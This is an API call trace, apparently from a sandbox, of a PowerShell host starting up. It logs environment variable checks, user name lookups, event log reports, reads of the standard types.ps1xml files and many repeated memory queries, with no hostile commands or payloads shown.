	[0061.604] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.604] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e41ba258*="Variable", lpRawData=0x233e41b9fe8) returned 1
	[0061.605] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8630
	[0061.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8630, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.605] CoTaskMemFree (pv=0x233e39e8630) 
	[0061.606] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0061.606] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.606] CoTaskMemFree (pv=0x233e39e9840) 
	[0061.622] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.622] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.623] CoTaskMemFree (pv=0x233e1210860) 
	[0061.623] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.623] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.623] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.623] ReportEventW (hEventLog=0x233e3810018, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x233e41ce200*="Certificate", lpRawData=0x233e41cdf90) returned 1
	[0061.625] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7ec0
	[0061.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.625] CoTaskMemFree (pv=0x233e39e7ec0) 
	[0061.625] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8b80
	[0061.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.626] CoTaskMemFree (pv=0x233e39e8b80) 
	[0061.626] GetACP () returned 0x4e4
	[0061.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x350027a240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0061.634] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.635] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6a8
	[0061.636] GetFileType (hFile=0x6a8) returned 0x1
	[0061.636] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.636] GetFileType (hFile=0x6a8) returned 0x1
	[0061.638] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e41da5b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e41da5b8*, lpNumberOfBytesRead=0x350027a7c8*=0x1000, lpOverlapped=0x0) returned 1
	[0061.641] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e41da5b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e41da5b8*, lpNumberOfBytesRead=0x350027a7c8*=0x3cc, lpOverlapped=0x0) returned 1
	[0061.668] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.670] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.670] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6a8
	[0061.670] GetFileType (hFile=0x6a8) returned 0x1
	[0061.670] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.670] GetFileType (hFile=0x6a8) returned 0x1
	[0061.670] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e422eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e422eba0*, lpNumberOfBytesRead=0x350027a7c8*=0x1000, lpOverlapped=0x0) returned 1
	[0061.674] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e422eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e422eba0*, lpNumberOfBytesRead=0x350027a7c8*=0x1000, lpOverlapped=0x0) returned 1
	[0061.675] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e422eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e422eba0*, lpNumberOfBytesRead=0x350027a7c8*=0x1000, lpOverlapped=0x0) returned 1
	[0061.678] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e422eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e422eba0*, lpNumberOfBytesRead=0x350027a7c8*=0x1000, lpOverlapped=0x0) returned 1
	[0061.682] ReadFile (in: hFile=0x6a8, lpBuffer=0x233e422eba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a7c8, lpOverlapped=0x0 | out: lpBuffer=0x233e422eba0*, lpNumberOfBytesRead=0x350027a7c8*=0x1000, lpOverlapped=0x0) returned 1
	[0061.781] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.782] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.783] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.784] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.785] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.785] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.786] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.787] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.798] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.798] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.798] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.799] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.799] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.800] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.800] VirtualQuery (in: lpAddress=0x279520, lpBuffer=0x350027a3e0, dwLength=0x30 | out: lpBuffer=0x350027a3e0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.800] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.801] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.801] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.809] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.819] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.819] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.820] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.820] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.821] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.821] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.822] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.822] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.823] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.823] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.823] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.823] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.824] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.824] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.824] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.827] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.829] VirtualQuery (in: lpAddress=0x279520, lpBuffer=0x350027a3e0, dwLength=0x30 | out: lpBuffer=0x350027a3e0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.830] VirtualQuery (in: lpAddress=0x279520, lpBuffer=0x350027a3e0, dwLength=0x30 | out: lpBuffer=0x350027a3e0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.830] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.831] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.884] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.885] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.885] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.886] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.886] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.886] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.887] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.889] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0061.889] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.889] CoTaskMemFree (pv=0x233e39e8850) 
	[0061.891] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.943] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.943] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.943] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.944] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.945] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.945] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.947] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.948] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.948] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.949] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.952] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.954] VirtualQuery (in: lpAddress=0x279510, lpBuffer=0x350027a3d0, dwLength=0x30 | out: lpBuffer=0x350027a3d0*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0061.959] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7db0
	[0061.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.960] CoTaskMemFree (pv=0x233e39e7db0) 
	[0061.962] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9840
	[0061.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.962] CoTaskMemFree (pv=0x233e39e9840) 
	[0061.962] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7db0
	[0061.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.962] CoTaskMemFree (pv=0x233e39e7db0) 
	[0061.963] CoTaskMemAlloc (cb=0x104) returned 0x233e39e90d0
	[0061.963] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e90d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.963] CoTaskMemFree (pv=0x233e39e90d0) 
	[0061.964] SetErrorMode (uMode=0x1) returned 0x8001
	[0061.965] SetErrorMode (uMode=0x8001) returned 0x1
	[0061.965] GetFileType (hFile=0x690) returned 0x1
	[0061.965] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a9de08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a9de08*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0061.967] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a9de08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a9de08*, lpNumberOfBytesRead=0x350027a518*=0x3d2, lpOverlapped=0x0) returned 1
	[0061.975] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x986e95e5, Data2=0x1c05, Data3=0x49b2, Data4=([0]=0xb9, [1]=0xb5, [2]=0xdc, [3]=0x7a, [4]=0x39, [5]=0x36, [6]=0xeb, [7]=0x66))) returned 0x0
	[0061.980] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xfc905f15, Data2=0x214d, Data3=0x4144, Data4=([0]=0xa4, [1]=0x10, [2]=0x7a, [3]=0xd0, [4]=0x1, [5]=0xa9, [6]=0xca, [7]=0xe6))) returned 0x0
	[0061.981] SetErrorMode (uMode=0x1) returned 0x8001
